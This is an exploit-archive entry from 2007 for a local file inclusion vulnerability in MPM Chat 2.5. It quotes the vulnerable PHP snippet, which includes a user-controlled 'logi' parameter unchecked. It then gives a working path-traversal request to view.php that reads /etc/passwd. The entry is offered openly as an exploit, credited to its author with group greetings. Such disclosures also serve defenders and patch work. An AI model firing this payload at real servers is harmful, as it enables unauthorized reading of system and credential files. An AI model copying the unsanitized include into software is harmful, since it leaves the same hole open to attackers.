MPM Chat 2.5 (view.php logi) Local File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MPM Chat 2.5 (view.php logi) Local File Include Vulnerability
# Published : 2007-03-17
# Author : GoLd_M
# Previous Title : Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit
# Next Title : Active PHP Bookmark Notes <= 0.2.5 Remote File Inclusion Exploit

# MPM Chat 2.5 (view.php logi) Local File Include Exploit
# D.Script: http://mpm.pahviloota.net/mpm_chat_25.zip
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
<?php
if ($logi != '') {
include 'archive/' . $logi;
#Exploit: /[path]/view.php?logi=../../../../../etc/passwd

# www.Syue.com [2007-03-17]